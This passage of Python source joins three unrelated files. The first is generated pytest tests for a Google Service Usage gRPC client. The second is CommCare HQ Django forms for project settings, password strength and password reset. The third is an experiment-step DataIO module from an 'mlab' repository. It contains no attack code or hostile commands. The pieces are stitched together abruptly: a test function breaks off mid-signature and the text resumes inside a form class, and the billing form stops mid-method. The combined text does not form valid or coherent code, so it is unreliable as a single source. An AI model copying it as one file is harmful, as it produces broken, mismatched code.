the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( operations_pb2.Operation(name='operations/spam') ) response = await client.create_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.CreateConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) @pytest.mark.asyncio async def test_create_consumer_override_async_from_dict(): await test_create_consumer_override_async(request_type=dict) def test_create_consumer_override_field_headers(): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.CreateConsumerOverrideRequest() request.parent = 'parent/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_consumer_override), '__call__') as call: call.return_value = operations_pb2.Operation(name='operations/op') client.create_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'parent=parent/value', ) in kw['metadata'] @pytest.mark.asyncio async def test_create_consumer_override_field_headers_async(): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.CreateConsumerOverrideRequest() request.parent = 'parent/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_consumer_override), '__call__') as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op')) await client.create_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'parent=parent/value', ) in kw['metadata'] def test_update_consumer_override(transport: str = 'grpc', request_type=serviceusage.UpdateConsumerOverrideRequest): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = operations_pb2.Operation(name='operations/spam') response = client.update_consumer_override(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.UpdateConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) def test_update_consumer_override_from_dict(): test_update_consumer_override(request_type=dict) def test_update_consumer_override_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), transport='grpc', ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: client.update_consumer_override() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.UpdateConsumerOverrideRequest() @pytest.mark.asyncio async def test_update_consumer_override_async(transport: str = 'grpc_asyncio', request_type=serviceusage.UpdateConsumerOverrideRequest): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( operations_pb2.Operation(name='operations/spam') ) response = await client.update_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.UpdateConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) @pytest.mark.asyncio async def test_update_consumer_override_async_from_dict(): await test_update_consumer_override_async(request_type=dict) def test_update_consumer_override_field_headers(): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.UpdateConsumerOverrideRequest() request.name = 'name/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: call.return_value = operations_pb2.Operation(name='operations/op') client.update_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'name=name/value', ) in kw['metadata'] @pytest.mark.asyncio async def test_update_consumer_override_field_headers_async(): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.UpdateConsumerOverrideRequest() request.name = 'name/value' # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op')) await client.update_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'name=name/value', ) in kw['metadata'] def test_delete_consumer_override(transport: str = 'grpc', request_type=serviceusage.DeleteConsumerOverrideRequest): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = operations_pb2.Operation(name='operations/spam') response = client.delete_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.DeleteConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) def test_delete_consumer_override_from_dict(): test_delete_consumer_override(request_type=dict) def test_delete_consumer_override_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), transport='grpc', ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: client.delete_consumer_override() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.DeleteConsumerOverrideRequest() @pytest.mark.asyncio async def test_delete_consumer_override_async(transport: str = 'grpc_asyncio', request_type=serviceusage.DeleteConsumerOverrideRequest): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( operations_pb2.Operation(name='operations/spam') ) response = await client.delete_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.DeleteConsumerOverrideRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, future.Future) @pytest.mark.asyncio async def test_delete_consumer_override_async_from_dict(): await test_delete_consumer_override_async(request_type=dict) def test_delete_consumer_override_field_headers(): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.DeleteConsumerOverrideRequest() request.name = 'name/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: call.return_value = operations_pb2.Operation(name='operations/op') client.delete_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'name=name/value', ) in kw['metadata'] @pytest.mark.asyncio async def test_delete_consumer_override_field_headers_async(): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.DeleteConsumerOverrideRequest() request.name = 'name/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op')) await client.delete_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'name=name/value', ) in kw['metadata'] def test_list_consumer_overrides(transport: str
"Unusual workflows or design decisions for others to watch out for." ), ) training_materials = CharField( label="Training materials", required=False, help_text=( "Where to find training materials or other relevant resources." ), ) partner_comments = CharField( label="Partner Comments", widget=forms.Textarea, required=False, help_text=( "past or anticipated problems with this partner." ), ) partner_contact = CharField( label="Partner contact", required=False, help_text=( "Primary partner point of contact going forward (type username of existing web user)." ), ) dimagi_contact = CharField( label="Dimagi contact", required=False, help_text=( "Primary Dimagi point of contact going forward (type username of existing web user)." ), ) send_handoff_email = forms.BooleanField( label="Send Hand-off Email", required=False, help_text=( "Check this box to trigger a hand-off email to the partner when this form is submitted." ), ) use_custom_auto_case_update_hour = forms.ChoiceField( label=ugettext_lazy("Choose specific time for custom auto case update rules to run"), required=True, choices=( ('N', ugettext_lazy("No")), ('Y', ugettext_lazy("Yes")), ), ) auto_case_update_hour = forms.IntegerField( label=ugettext_lazy("Hour of the day, in UTC, for rules to run (0-23)"), required=False, min_value=0, max_value=23, ) use_custom_auto_case_update_limit = forms.ChoiceField( label=ugettext_lazy("Set custom auto case update rule limits"), required=True, choices=( ('N', ugettext_lazy("No")), ('Y', ugettext_lazy("Yes")), ), ) auto_case_update_limit = forms.IntegerField( label=ugettext_lazy("Max allowed updates in a daily run"), required=False, min_value=1000, ) use_custom_odata_feed_limit = forms.ChoiceField( label=ugettext_lazy("Set custom OData Feed Limit? Default is {}.").format( settings.DEFAULT_ODATA_FEED_LIMIT), required=True, choices=( ('N', ugettext_lazy("No")), ('Y', ugettext_lazy("Yes")), ), ) odata_feed_limit = forms.IntegerField( label=ugettext_lazy("Max allowed OData Feeds"), required=False, min_value=1, ) granted_messaging_access = forms.BooleanField( label="Enable Messaging", required=False, help_text="Check this box to enable messaging.", # TODO through non-test gateways ) def __init__(self, domain, can_edit_eula, *args, **kwargs): super(DomainInternalForm, self).__init__(*args, **kwargs) self.domain = domain self.can_edit_eula = can_edit_eula additional_fields = [] if self.can_edit_eula: additional_fields = ['custom_eula', 'can_use_data'] self.fields['custom_eula'] = ChoiceField( label="Custom Eula?", choices=tf_choices(_('Yes'), _('No')), required=False, help_text='Set to "yes" if this project has a customized EULA as per their contract.' ) self.fields['can_use_data'] = ChoiceField( label="Can use project data?", choices=tf_choices('Yes', 'No'), required=False, help_text='Set to "no" if this project opts out of data usage. Defaults to "yes".' 
) self.helper = hqcrispy.HQFormHelper() self.helper.layout = crispy.Layout( crispy.Fieldset( _("Basic Information"), 'initiative', 'workshop_region', 'self_started', 'is_test', 'area', 'sub_area', 'organization_name', 'notes', 'phone_model', 'business_unit', 'countries', 'commtrack_domain', 'performance_threshold', 'experienced_threshold', 'amplifies_workers', 'amplifies_project', 'data_access_threshold', crispy.Div(*additional_fields), ), crispy.Fieldset( _("Support Hand-off information"), 'partner_technical_competency', 'support_prioritization', 'gs_continued_involvement', 'technical_complexity', 'app_design_comments', 'training_materials', 'partner_comments', 'partner_contact', 'send_handoff_email', 'dimagi_contact', ), crispy.Fieldset( _("Project Limits"), crispy.Field( 'use_custom_auto_case_update_limit', data_bind='value: use_custom_auto_case_update_limit', ), crispy.Div( crispy.Field('auto_case_update_limit'), data_bind="visible: use_custom_auto_case_update_limit() === 'Y'", ), crispy.Field( 'use_custom_auto_case_update_hour', data_bind='value: use_custom_auto_case_update_hour', ), crispy.Div( crispy.Field('auto_case_update_hour'), data_bind="visible: use_custom_auto_case_update_hour() === 'Y'", ), crispy.Field( 'use_custom_odata_feed_limit', data_bind="value: use_custom_odata_feed_limit", ), crispy.Div( crispy.Field('odata_feed_limit'), data_bind="visible: use_custom_odata_feed_limit() === 'Y'", ), 'granted_messaging_access', ), crispy.Fieldset( _("Salesforce Details"), 'sf_contract_id', 'sf_account_id', ), hqcrispy.FormActions( StrictButton( _("Update Project Information"), type="submit", css_class='btn-primary', ), ), ) @property def current_values(self): return { 'use_custom_auto_case_update_hour': self['use_custom_auto_case_update_hour'].value(), 'use_custom_auto_case_update_limit': self['use_custom_auto_case_update_limit'].value(), 'use_custom_odata_feed_limit': self['use_custom_odata_feed_limit'].value() } def _get_user_or_fail(self, field): username = self.cleaned_data[field] if not username: return None user = WebUser.get_by_username(username) if not user: msg = "Web user with username '{username}' does not exist" self.add_error(field, msg.format(username=username)) elif not user.is_member_of(self.domain): msg = "'{username}' is not the username of a web user in '{domain}'" self.add_error(field, msg.format(username=username, domain=self.domain)) return user def clean_auto_case_update_hour(self): if self.cleaned_data.get('use_custom_auto_case_update_hour') != 'Y': return None value = self.cleaned_data.get('auto_case_update_hour') if not value: raise forms.ValidationError(_("This field is required")) return value def clean_auto_case_update_limit(self): if self.cleaned_data.get('use_custom_auto_case_update_limit') != 'Y': return None value = self.cleaned_data.get('auto_case_update_limit') if not value: raise forms.ValidationError(_("This field is required")) return value def clean_odata_feed_limit(self): if self.cleaned_data.get('use_custom_odata_feed_limit') != 'Y': return None value = self.cleaned_data.get('odata_feed_limit') if not value: raise forms.ValidationError(_("Please specify a limit for OData feeds.")) return value def clean(self): send_handoff_email = self.cleaned_data['send_handoff_email'] partner_user = self._get_user_or_fail('partner_contact') if not partner_user and send_handoff_email: msg = "You can't send a hand-off email without specifying a partner contact." 
self.add_error('partner_contact', msg) dimagi_user = self._get_user_or_fail('dimagi_contact') if send_handoff_email and not dimagi_user: msg = "You can't send a hand-off email without specifying a contact at dimagi." self.add_error('dimagi_contact', msg) elif send_handoff_email and not dimagi_user.full_name: msg = ("The dimagi user '{}' does not have a name configured, please" "go to your account settings and add a name before attempting " "to send an email to the partner.").format(dimagi_user.username) self.add_error('dimagi_contact', msg) def save(self, domain): kwargs = { "workshop_region": self.cleaned_data["workshop_region"] } if self.cleaned_data["workshop_region"] else {} if self.can_edit_eula: kwargs['custom_eula'] = self.cleaned_data['custom_eula'] == 'true' kwargs['can_use_data'] = self.cleaned_data['can_use_data'] == 'true' domain.update_deployment( countries=self.cleaned_data['countries'], ) domain.is_test = self.cleaned_data['is_test'] domain.auto_case_update_hour = self.cleaned_data['auto_case_update_hour'] domain.auto_case_update_limit = self.cleaned_data['auto_case_update_limit'] domain.odata_feed_limit = self.cleaned_data['odata_feed_limit'] domain.granted_messaging_access = self.cleaned_data['granted_messaging_access'] domain.update_internal( sf_contract_id=self.cleaned_data['sf_contract_id'], sf_account_id=self.cleaned_data['sf_account_id'], initiative=self.cleaned_data['initiative'], self_started=self.cleaned_data['self_started'] == 'true', area=self.cleaned_data['area'], sub_area=self.cleaned_data['sub_area'], organization_name=self.cleaned_data['organization_name'], notes=self.cleaned_data['notes'], phone_model=self.cleaned_data['phone_model'], commtrack_domain=self.cleaned_data['commtrack_domain'] == 'true', performance_threshold=self.cleaned_data['performance_threshold'], experienced_threshold=self.cleaned_data['experienced_threshold'], amplifies_workers=self.cleaned_data['amplifies_workers'], amplifies_project=self.cleaned_data['amplifies_project'], business_unit=self.cleaned_data['business_unit'], data_access_threshold=self.cleaned_data['data_access_threshold'], partner_technical_competency=self.cleaned_data['partner_technical_competency'], support_prioritization=self.cleaned_data['support_prioritization'], gs_continued_involvement=self.cleaned_data['gs_continued_involvement'], technical_complexity=self.cleaned_data['technical_complexity'], app_design_comments=self.cleaned_data['app_design_comments'], training_materials=self.cleaned_data['training_materials'], partner_comments=self.cleaned_data['partner_comments'], partner_contact=self.cleaned_data['partner_contact'], dimagi_contact=self.cleaned_data['dimagi_contact'], **kwargs ) def clean_password(txt): if has_custom_clean_password(): message = custom_clean_password(txt) else: message = _clean_password(txt) if message: raise forms.ValidationError(message) return txt def _clean_password(txt): strength = zxcvbn(txt, user_inputs=['commcare', 'hq', 'dimagi', 'commcarehq']) if strength['score'] < 2: return _('Password is not strong enough. 
Try making your password more complex.') class NoAutocompleteMixin(object): def __init__(self, *args, **kwargs): super(NoAutocompleteMixin, self).__init__(*args, **kwargs) if settings.DISABLE_AUTOCOMPLETE_ON_SENSITIVE_FORMS: for field in self.fields.values(): field.widget.attrs.update({'autocomplete': 'off'}) class HQPasswordResetForm(NoAutocompleteMixin, forms.Form): """ Only finds users and emails forms where the USERNAME is equal to the email specified (preventing Mobile Workers from using this form to submit). This small change is why we can't use the default PasswordReset form. """ email = forms.EmailField(label=ugettext_lazy("Email"), max_length=254, widget=forms.TextInput(attrs={'class': 'form-control'})) if settings.ADD_CAPTCHA_FIELD_TO_FORMS: captcha = CaptchaField(label=ugettext_lazy("Type the letters in the box")) error_messages = { 'unknown': ugettext_lazy("That email address doesn't have an associated user account. Are you sure you've " "registered?"), 'unusable': ugettext_lazy("The user account associated with this email address cannot reset the " "password."), } def clean_email(self): UserModel = get_user_model() email = self.cleaned_data["email"] matching_users = UserModel._default_manager.filter(username__iexact=email) # below here is not modified from the superclass if not len(matching_users): raise forms.ValidationError(self.error_messages['unknown']) if not any(user.is_active for user in matching_users): # none of the filtered users are active raise forms.ValidationError(self.error_messages['unknown']) if any((user.password == UNUSABLE_PASSWORD_PREFIX) for user in matching_users): raise forms.ValidationError(self.error_messages['unusable']) return email def save(self, domain_override=None, subject_template_name='registration/password_reset_subject.txt', email_template_name='registration/password_reset_email.html', # WARNING: Django 1.7 passes this in automatically. do not remove html_email_template_name=None, use_https=False, token_generator=default_token_generator, from_email=None, request=None, **kwargs): """ Generates a one-use only link for resetting password and sends to the user. """ if settings.IS_SAAS_ENVIRONMENT: subject_template_name = 'registration/email/password_reset_subject_hq.txt' email_template_name = 'registration/email/password_reset_email_hq.html' email = self.cleaned_data["email"] # this is the line that we couldn't easily override in PasswordForm where # we specifically filter for the username, not the email, so that # mobile workers who have the same email set as a web worker don't # get a password reset email. 
active_users = get_active_users_by_email(email) # the code below is copied from default PasswordForm for user in active_users: # Make sure that no email is sent to a user that actually has # a password marked as unusable if not user.has_usable_password(): continue if not domain_override: current_site = get_current_site(request) site_name = current_site.name domain = current_site.domain else: site_name = domain = domain_override couch_user = CouchUser.from_django_user(user) if not couch_user: continue if couch_user.is_web_user(): user_email = user.username elif user.email: user_email = user.email else: continue c = { 'email': user_email, 'domain': domain, 'site_name': site_name, 'uid': urlsafe_base64_encode(force_bytes(user.pk)), 'user': user, 'token': token_generator.make_token(user), 'protocol': 'https' if use_https else 'http', } subject = render_to_string(subject_template_name, c) # Email subject *must not* contain newlines subject = ''.join(subject.splitlines()) message_plaintext = render_to_string('registration/password_reset_email.html', c) message_html = render_to_string(email_template_name, c) send_html_email_async.delay( subject, user_email, message_html, text_content=message_plaintext, email_from=settings.DEFAULT_FROM_EMAIL ) class ConfidentialPasswordResetForm(HQPasswordResetForm): def clean_email(self): try: return super(ConfidentialPasswordResetForm, self).clean_email() except forms.ValidationError: # The base class throws various emails that give away information about the user; # we can pretend all is well since the save() method is safe for missing users. return self.cleaned_data['email'] class HQSetPasswordForm(SetPasswordForm): new_password1 = forms.CharField(label=ugettext_lazy("New password"), widget=forms.PasswordInput( attrs={'data-bind': "value: password, valueUpdate: 'input'"}), help_text=mark_safe(""" <span data-bind="text: passwordHelp, css: color"> """)) def save(self, commit=True): user = super(HQSetPasswordForm, self).save(commit) couch_user = CouchUser.from_django_user(user) couch_user.last_password_set = datetime.datetime.utcnow() if commit: couch_user.save() return user class EditBillingAccountInfoForm(forms.ModelForm): email_list = forms.CharField( label=BillingContactInfo._meta.get_field('email_list').verbose_name, help_text=BillingContactInfo._meta.get_field('email_list').help_text, widget=forms.SelectMultiple(choices=[]), ) class Meta(object): model = BillingContactInfo fields = ['first_name', 'last_name', 'phone_number', 'company_name', 'first_line', 'second_line', 'city', 'state_province_region', 'postal_code', 'country'] widgets = {'country': forms.Select(choices=[])} def __init__(self, account, domain, creating_user, data=None, *args, **kwargs): self.account = account self.domain = domain self.creating_user = creating_user is_ops_user = kwargs.pop('is_ops_user', False) try: self.current_country = self.account.billingcontactinfo.country except Exception: initial = kwargs.get('initial') self.current_country = initial.get('country') if initial is not None else None try: kwargs['instance'] = self.account.billingcontactinfo kwargs['initial'] = { 'email_list': self.account.billingcontactinfo.email_list, }
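# --- Added illustrative sketch (not part of the original HQ forms module) ---
# HQPasswordResetForm.save() above embeds a base64-encoded user id ('uid') and a
# one-time token in the reset email. A hypothetical confirm view would reverse
# that encoding and validate the token with the same default_token_generator
# before letting the user set a new password; force_text matches the
# ugettext-era Django used in this module.
from django.contrib.auth import get_user_model
from django.contrib.auth.tokens import default_token_generator
from django.utils.encoding import force_text
from django.utils.http import urlsafe_base64_decode


def check_reset_link(uidb64, token):
    """Return the matching user if the uid/token pair from a reset link is valid, else None."""
    UserModel = get_user_model()
    try:
        uid = force_text(urlsafe_base64_decode(uidb64))
        user = UserModel._default_manager.get(pk=uid)
    except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist):
        return None
    return user if default_token_generator.check_token(user, token) else None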
<reponame>tgbugs/mlab #TODO FIXME there are three things that are trying to go on here #1) easy way to create the steps of an experiment #2) easy way to create the datasources for an experiment #3) bind the result to an object #compatability between the three breaks down when: #the datasource specified by 2 is not 1:1 with the result generated by the step 1 #put another way: if the object generated by 1 is not what we want to bind in 3 #because we want to bind a sub component of 3 #eg multiple df placeholders, the datafile and record datafile #FIXME fuck, it is rather obvious that steps have substeps... but this could be hard to persist? #FIXME also, datasources really do need to be reused... #TODO the step object in the database... should link... datasources, analysis, etc to the object... but that is already done... #it is hard to understand the logic of a list of measurements and analysis especially if something like a sanity check is not annotated as such #it would depend on the name given to the object... #FIXME ALL STEPS, EVEN THE MOST BASIC, ARE DATASORUCES, booleans saying 'this step is done!' based on the class name of the step class BaseDataIO: """ Base class for all experiment steps This should be extended for each type of step Step types should then be extended once more To define individual records/steps :attr::class:`.MappedClass` should appear in local namespace via `from database.models import ModelName as MappedClass`. These classes are things that ususally will not need to be queried within the scope of datacollection. :attr::string:`.ctrl_name` :attr::list:`.prereqList` :param: Controller, a class instance w/ function that can return floats, Controller.__class__.__name__ must match ctrl_name :param: session, a sqlalchemy database session that (hopefully) has tables matching your mapped classes :meth:`.Persist` :meth:`.do` retunrs self.value """ #FIXME could make a factory function that takes the class variables and returns the class... #the only issue is writeTarget can't be checked before hand :/ MappedClass=None #from database.models import thing as MappedClass mappedClassPropertiesDict={} #things required by the database, eg datasource units ctrl_name=None @property def name(self): #FIXME add a way to explicity name classes if you want? return self.__class__.__name__[4:] def __init__(self,Controller,session): #FIXME controller could also be a MappedInstance? if Controller.__class__.__name__==self.ctrl_name: self.controller_version=Controller.version #FIXME hash the file or something for external stuff #BIGGER FIXME doccumenting which version of the controller was used is now VITAL if not self.controller_version: raise AttributeError('What are you doing not keeping track of' ' what software you used! BAD SCIENTIST') self.ctrl=Controller else: raise TypeError('Wrong controller for this step!') self.session=session try: self.MappedInstance=self.session.query(MappedClass).filter_by(name=self.name).one() except NoResultFound: self.Persist() def checkVersion(self,thing,strict=False): #validate that the code has not changed #TODO this should be handled at the level of the experiment #hash the code of the thing #FIXME should this all be here or should it be tracked globally on startup? if strict: #hash the file that it came from and compare it to the previous hash pass def Persist(self): """ Returns None Creates an instance of :class:`.MappedClass` according to other defined params, assigns it to :instance:`.MappedInstance` and commits it to the database. 
""" raise NotImplementedError('You MUST implement this at the subclass level') def do(self): raise NotImplementedError('You MUST implement this at the subclass level') class DataIO(BaseDataIO): #IXCK ugly ugly might be nice for a factory :/ but is poorly constrained @do, so slow #NOTE TO SELF: this interface needs to be here unless we go with STI for dataio objects in order to implement persistence, and EVEN THAT misses the point which is that there are live functions that we want to run and have doccumented, I supposed using only names it would be possible to init everything and save it BUT we would still need something to deal with actually tying it all together at run time which is what THIS is supposed to do #doing it this way we keep the all the relevant information in one place that can all be seen at the same time and debugged more easily #the alternative is generating DataIO objects directly from database entries but that still leaves tying them to actual live code objects which seems like it could go very wrong and would still require an input interface and we would essentially be persisting a class that looks like this anyway #probably do want a way to recreate classes straight from the database though... but that is alot of work and we will have to do it in the future NOT RIGHT NOW MappedClass=None #from database.models import thing as MappedClass mcKwargs={} # MappedClass(**kwargs) things for the database, eg datasource units ctrl_name=None #FIXME why do we need this again??? ANSWER: because we need live functions and I'm not sure the best way to unambigiously name a 'dead' function of a class and make it live (the way in rigcont is iffy) getter_name=None #name of the function used to get stuff writer_name=None #eg getattr(writeTarget,self.writer_name) collection_name=None #eg metadata_ or something setter_name=None #FIXME the name of the setting function check_function=None #FIXME checks are ONLY going to be written to experiments, so we can pull them out to steps? or even make them their own step akin to analysis? yeah, because checks often need to occur across multiple steps and longer stretches of time analysis_function=None #FIXME probably should be a from xyz import thing as function def __init__(self,Controller,session): super().__init__(Controller,session) if getter_name: self.getter=getattr(self.ctrl,self.getter_name) #FIXME allow override if setter_name: self.setter=getattr(self.ctrl,self.setter_name) #TODO version checks def Persist(self): #self.MappedInstance=MappedClass(name=self.name,prefix=self.prefix,unit=self.unit,mantissa=self.mantissa,hardware_id=hardware_id) self.MappedInstance=MappedClass(**self.mcKwargs) self.session.add(self.MappedInstance) self.session.commit() def setValue(self,set_value,error=0): #both value and expected value will be recoreded somehow... self.expected_value=set_value self.ev_error=error #allowed error self.setter(self.expected_value) def getValue(self,analysis_value=None): self.value=analysis_value #FIXME how do we link this to the output... if not self.value: self.value=self.getter() def checkValue(self): #FIXME making check steps similar to analysis simplifies saving results self.check_function() def analysis(self): #FIXME need version control here... 
:/ so it is possible to track down errors self.value=self.analysis_function(self.value) def writeValue(self,writeTarget,autocommit=False): collection=getattr(writeTarget,self.collection_name) writer=getattr(writeTarget,self.writer_name) collection.append(writer(MappedInstance,self.value)) #FIXME this gives some insight into array formats if autocommit: self.session.commit() def do(self,writeTarget=None,set_value=None,set_error=0,analysis_value=None,autocommit=False): if set_value: #FIXME handle lack of setter_name? self.setValue(set_value,set_error) #TODO make sure that this will block properly if analysis_value: self.getValue(analysis_value) else: self.getValue() if self.analysis_function: self.analysis() #FIXME how to check these... if writeTarget: self.writeValue(writeTarget,autocommit) if self.check_function: self.checkValue() #check post write and THEN raise so that the bad value is recorded return self.value class Get(BaseDataIO): #MappedClass=None #GET DOESNT NEED THIS??!?! ctrl_name=None getter_name=None #name of the function used to get stuff def __init__(self,Controller,session): super().__init__(Controller,session) if getter_name: self.getter=getattr(self.ctrl,self.getter_name) #FIXME allow override def getValue(self): self.value=self.getter() def do(self): self.getValue() return self.value class GetWrite(Get): MappedClass=None #from database.models import thing as MappedClass ctrl_name=None getter_name=None #name of the function used to get stuff writer_name=None #eg getattr(writeTarget,self.writer_name) collection_name=None #eg metadata_ or something def writeValue(self,writeTarget,autocommit=False): collection=getattr(writeTarget,self.collection_name) writer=getattr(writeTarget,self.writer_name) collection.append(writer(MappedInstance,self.value)) #FIXME this gives some insight into array formats if autocommit: self.session.commit() def do(self,writeTarget): self.getValue() self.writeValue(writeTarget) return self.value class SetGetWriteCheck(GetWrite): #this is the basis for following protocols... eg print and input MappedClass=None #from database.models import thing as MappedClass ctrl_name=None getter_name=None #name of the function used to get stuff writer_name=None #eg getattr(writeTarget,self.writer_name) collection_name=None #eg metadata_ or something setter_name=None #FIXME the name of the setting function def __init__(self,Controller,session): super().__init__(Controller,session) if setter_name: self.setter=getattr(self.ctrl,self.setter_name) def setValue(self,set_value,error=0): #both value and expected value will be recoreded somehow... self.expected_value=set_value self.ev_error=error #allowed error self.setter(self.expected_value) def checkValue(self): raise NotImplementedError('You MUST implement this at the subclass level') def do(self,writeTarget,set_value): self.setValue(set_value) #TODO make sure that this will block properly super().do(writeTarget) #FIXME this needs to write value AND expected_value self.checkValue() #check post write and THEN raise so that the bad value is recorded return self.value class Analysis(Get): #mostly for online stuff that won't be persisted which is really very few things MappedClass=None #from database.models import thing as MappedClass ctrl_name=None getter_name=None #name of the function used to get stuff analysis_function=None #FIXME probably should be a from xyz import thing as function def getValue(self,analysis_value=None): self.value=analysis_value #FIXME how do we link this to the output... 
if not self.value: super().getValue() #FIXME make sure this sets self.value correctly def analysis(self): self.value=self.analysis_function(self.value)
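# --- Added illustrative sketch (hypothetical, not part of the original module) ---
# A concrete step is declared by subclassing one of the bases above and filling in
# the class attributes; TempController and getTemp below are invented names used
# only to show the pattern the docstrings describe.
class GetTemperature(Get):
    ctrl_name = 'TempController'   # must equal Controller.__class__.__name__
    getter_name = 'getTemp'        # name of the controller method that returns the reading

# usage sketch: the controller instance and sqlalchemy session come from the
# experiment setup, as in BaseDataIO.__init__
# step = GetTemperature(temp_controller, session)
# reading = step.do()             # binds controller.getTemp() and returns its value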
